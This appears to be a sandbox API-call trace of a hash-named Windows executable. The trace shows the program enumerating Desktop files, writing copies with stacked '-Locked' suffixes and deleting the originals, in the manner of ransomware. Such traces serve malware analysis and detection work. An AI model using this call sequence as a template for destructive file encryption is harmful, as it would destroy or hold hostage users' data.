ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32932f7c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv-Locked", cAlternateFileName="EKQ_ZA~2.MKV")) returned 1 [0305.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32942c61, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32942c61, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32942c61, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav-Locked", cAlternateFileName="ITP31J~2.WAV")) returned 1 [0305.183] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329516ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329516ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329516ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi-Locked", cAlternateFileName="IXYBAL~1.AVI")) returned 1 [0305.183] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32963be4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32963be4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32963be4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt-Locked", cAlternateFileName="SSEWKY~2.PPT")) returned 1 [0305.183] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3297399a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3297399a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3297399a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4-Locked", cAlternateFileName="UJK4SN~2.MP4")) returned 1 [0305.184] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32986238, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32986238, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32986238, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked", cAlternateFileName="YZL8R1~2.SWF")) returned 1 [0305.184] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32986238, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32986238, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32986238, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked", cAlternateFileName="YZL8R1~2.SWF")) returned 0 [0305.184] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0305.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0305.185] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked", lpFilePart=0x0) returned 0x56 [0305.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0305.185] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\e zb4hlmv59fpdjuh6qt.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.185] GetFileType (hFile=0x49c) returned 0x1 [0305.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0305.185] GetFileType (hFile=0x49c) returned 0x1 [0305.187] CloseHandle (hObject=0x49c) returned 1 [0305.188] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked", lpFilePart=0x0) returned 0x4f [0305.188] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\E ZB4hlMv59fpDjUh6qT.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\e zb4hlmv59fpdjuh6qt.m4a-locked")) returned 1 [0305.189] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked", lpFilePart=0x0) returned 0x4b [0305.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0305.189] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ekq_za-wa.mkv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.189] GetFileType (hFile=0x49c) returned 0x1 [0305.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0305.189] GetFileType (hFile=0x49c) returned 0x1 [0305.191] CloseHandle (hObject=0x49c) returned 1 [0305.191] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked", lpFilePart=0x0) returned 0x44 [0305.191] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\eKq_zA-WA.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ekq_za-wa.mkv-locked")) returned 1 [0305.192] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked", lpFilePart=0x0) returned 0x51 [0305.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0305.192] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\itp31jjvgr0dsuq.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.192] GetFileType (hFile=0x49c) returned 0x1 [0305.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0305.192] GetFileType (hFile=0x49c) returned 0x1 [0305.194] CloseHandle (hObject=0x49c) returned 1 [0305.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked", lpFilePart=0x0) returned 0x4a [0305.194] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\iTP31jJvGR0dsUQ.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\itp31jjvgr0dsuq.wav-locked")) returned 1 [0305.195] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked", lpFilePart=0x0) returned 0x48 [0305.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0305.195] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ixybal.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.195] GetFileType (hFile=0x49c) returned 0x1 [0305.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0305.196] GetFileType (hFile=0x49c) returned 0x1 [0305.197] CloseHandle (hObject=0x49c) returned 1 [0305.197] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked", lpFilePart=0x0) returned 0x41 [0305.197] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\ixYbal.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ixybal.avi-locked")) returned 1 [0305.198] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked", lpFilePart=0x0) returned 0x54 [0305.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0305.198] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\s sewkydoda_c3bxch.ppt-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.199] GetFileType (hFile=0x49c) returned 0x1 [0305.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0305.199] GetFileType (hFile=0x49c) returned 0x1 [0305.201] CloseHandle (hObject=0x49c) returned 1 [0305.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked", lpFilePart=0x0) returned 0x4d [0305.201] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\S sEwkyDOda_C3BxCH.ppt-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\s sewkydoda_c3bxch.ppt-locked")) returned 1 [0305.202] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked", lpFilePart=0x0) returned 0x53 [0305.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0305.202] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ujk4snw9z16p4ofdz.mp4-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.202] GetFileType (hFile=0x49c) returned 0x1 [0305.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0305.203] GetFileType (hFile=0x49c) returned 0x1 [0305.204] CloseHandle (hObject=0x49c) returned 1 [0305.205] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked", lpFilePart=0x0) returned 0x4c [0305.205] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\Ujk4snw9z16p4ofDz.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\ujk4snw9z16p4ofdz.mp4-locked")) returned 1 [0305.205] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0305.206] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\yzl8r176shb.swf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.206] GetFileType (hFile=0x49c) returned 0x1 [0305.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0305.206] GetFileType (hFile=0x49c) returned 0x1 [0305.208] CloseHandle (hObject=0x49c) returned 1 [0305.242] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked", lpFilePart=0x0) returned 0x46 [0305.242] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\YZL8R176sHB.swf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bgqh9xm98-f_e sij\\yzl8r176shb.swf-locked")) returned 1 [0305.244] GetUserNameW (in: lpBuffer=0x1aefec, pcbBuffer=0x1af264 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1af264) returned 1 [0305.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.245] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0305.245] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0305.245] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.246] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.246] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x346f313f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x346f313f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346f313f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0305.246] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35eba5f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35eba5f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35eba5f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~2.JPG")) returned 1 [0305.247] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34724090, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34724090, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34724090, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0305.247] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f01333, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f01333, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f01333, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0305.247] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0305.248] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f1993c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0305.248] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f72b69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f72b69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f72b69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", cAlternateFileName="69811A~3.EXE")) returned 1 [0305.248] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0305.248] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fa387f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fa387f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fa387f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked", cAlternateFileName="AUTORU~2.INF")) returned 1 [0305.248] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0305.249] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0305.249] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fd6d70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fd6d70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fd6d70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked", cAlternateFileName="BGQH9X~3")) returned 1 [0305.249] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0305.249] 